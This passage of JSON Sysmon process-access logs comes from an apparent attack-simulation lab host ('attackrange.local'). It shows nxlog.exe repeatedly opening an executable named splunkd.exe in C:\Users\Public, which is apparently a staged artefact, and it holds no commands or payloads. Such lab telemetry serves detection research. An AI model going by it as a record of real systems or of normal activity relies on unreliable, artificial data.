(x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","EventReceivedTime":"2020-08-01 06:53:04","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:53:04","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4391,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:53:04.489\r\nSourceProcessGUID: {E2A3D6B1-106B-5F25-0000-001054C00200}\r\nSourceProcessId: 2116\r\nSourceThreadId: 3592\r\nSourceImage: C:\\Program Files (x86)\\nxlog\\nxlog.exe\r\nTargetProcessGUID: {E2A3D6B1-1061-5F25-0000-001069980200}\r\nTargetProcessId: 2308\r\nTargetImage: C:\\Users\\Public\\splunkd.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:53:04.489","SourceProcessGUID":"{E2A3D6B1-106B-5F25-0000-001054C00200}","SourceProcessId":"2116","SourceThreadId":"3592","SourceImage":"C:\\Program Files (x86)\\nxlog\\nxlog.exe","TargetProcessGUID":"{E2A3D6B1-1061-5F25-0000-001069980200}","TargetProcessId":"2308","TargetImage":"C:\\Users\\Public\\splunkd.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","EventReceivedTime":"2020-08-01 06:53:04","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:53:05","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4392,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:53:05.490\r\nSourceProcessGUID: {E2A3D6B1-106B-5F25-0000-001054C00200}\r\nSourceProcessId: 2116\r\nSourceThreadId: 3576\r\nSourceImage: C:\\Program Files (x86)\\nxlog\\nxlog.exe\r\nTargetProcessGUID: {E2A3D6B1-1061-5F25-0000-001069980200}\r\nTargetProcessId: 2308\r\nTargetImage: C:\\Users\\Public\\splunkd.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:53:05.490","SourceProcessGUID":"{E2A3D6B1-106B-5F25-0000-001054C00200}","SourceProcessId":"2116","SourceThreadId":"3576","SourceImage":"C:\\Program Files (x86)\\nxlog\\nxlog.exe","TargetProcessGUID":"{E2A3D6B1-1061-5F25-0000-001069980200}","TargetProcessId":"2308","TargetImage":"C:\\Users\\Public\\splunkd.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","EventReceivedTime":"2020-08-01 06:53:06","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:53:06","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4393,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:53:06.490\r\nSourceProcessGUID: {E2A3D6B1-106B-5F25-0000-001054C00200}\r\nSourceProcessId: 2116\r\nSourceThreadId: 3592\r\nSourceImage: C:\\Program Files (x86)\\nxlog\\nxlog.exe\r\nTargetProcessGUID: {E2A3D6B1-1061-5F25-0000-001069980200}\r\nTargetProcessId: 2308\r\nTargetImage: C:\\Users\\Public\\splunkd.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:53:06.490","SourceProcessGUID":"{E2A3D6B1-106B-5F25-0000-001054C00200}","SourceProcessId":"2116","SourceThreadId":"3592","SourceImage":"C:\\Program Files (x86)\\nxlog\\nxlog.exe","TargetProcessGUID":"{E2A3D6B1-1061-5F25-0000-001069980200}","TargetProcessId":"2308","TargetImage":"C:\\Users\\Public\\splunkd.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","EventReceivedTime":"2020-08-01 06:53:06","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:53:07","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4394,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:53:07.490\r\nSourceProcessGUID: {E2A3D6B1-106B-5F25-0000-001054C00200}\r\nSourceProcessId: 2116\r\nSourceThreadId: 3596\r\nSourceImage: C:\\Program Files (x86)\\nxlog\\nxlog.exe\r\nTargetProcessGUID: {E2A3D6B1-1061-5F25-0000-001069980200}\r\nTargetProcessId: 2308\r\nTargetImage: C:\\Users\\Public\\splunkd.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:53:07.490","SourceProcessGUID":"{E2A3D6B1-106B-5F25-0000-001054C00200}","SourceProcessId":"2116","SourceThreadId":"3596","SourceImage":"C:\\Program Files (x86)\\nxlog\\nxlog.exe","TargetProcessGUID":"{E2A3D6B1-1061-5F25-0000-001069980200}","TargetProcessId":"2308","TargetImage":"C:\\Users\\Public\\splunkd.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","EventReceivedTime":"2020-08-01 06:53:08","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:53:08","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4395,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:53:08.491\r\nSourceProcessGUID: {E2A3D6B1-106B-5F25-0000-001054C00200}\r\nSourceProcessId: 2116\r\nSourceThreadId: 3592\r\nSourceImage: C:\\Program Files (x86)\\nxlog\\nxlog.exe\r\nTargetProcessGUID: {E2A3D6B1-1061-5F25-0000-001069980200}\r\nTargetProcessId: 2308\r\nTargetImage: C:\\Users\\Public\\splunkd.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:53:08.491","SourceProcessGUID":"{E2A3D6B1-106B-5F25-0000-001054C00200}","SourceProcessId":"2116","SourceThreadId":"3592","SourceImage":"C:\\Program Files (x86)\\nxlog\\nxlog.exe","TargetProcessGUID":"{E2A3D6B1-1061-5F25-0000-001069980200}","TargetProcessId":"2308","TargetImage":"C:\\Users\\Public\\splunkd.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","EventReceivedTime":"2020-08-01 06:53:08","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:53:09","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4396,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:53:09.491\r\nSourceProcessGUID: {E2A3D6B1-106B-5F25-0000-001054C00200}\r\nSourceProcessId: 2116\r\nSourceThreadId: 3588\r\nSourceImage: C:\\Program Files (x86)\\nxlog\\nxlog.exe\r\nTargetProcessGUID: {E2A3D6B1-1061-5F25-0000-001069980200}\r\nTargetProcessId: 2308\r\nTargetImage: C:\\Users\\Public\\splunkd.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:53:09.491","SourceProcessGUID":"{E2A3D6B1-106B-5F25-0000-001054C00200}","SourceProcessId":"2116","SourceThreadId":"3588","SourceImage":"C:\\Program Files (x86)\\nxlog\\nxlog.exe","TargetProcessGUID":"{E2A3D6B1-1061-5F25-0000-001069980200}","TargetProcessId":"2308","TargetImage":"C:\\Users\\Public\\splunkd.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","EventReceivedTime":"2020-08-01 06:53:10","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:53:10","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4397,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:53:10.491\r\nSourceProcessGUID: {E2A3D6B1-106B-5F25-0000-001054C00200}\r\nSourceProcessId: 2116\r\nSourceThreadId: 3592\r\nSourceImage: C:\\Program Files (x86)\\nxlog\\nxlog.exe\r\nTargetProcessGUID: {E2A3D6B1-1061-5F25-0000-001069980200}\r\nTargetProcessId: 2308\r\nTargetImage: C:\\Users\\Public\\splunkd.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files 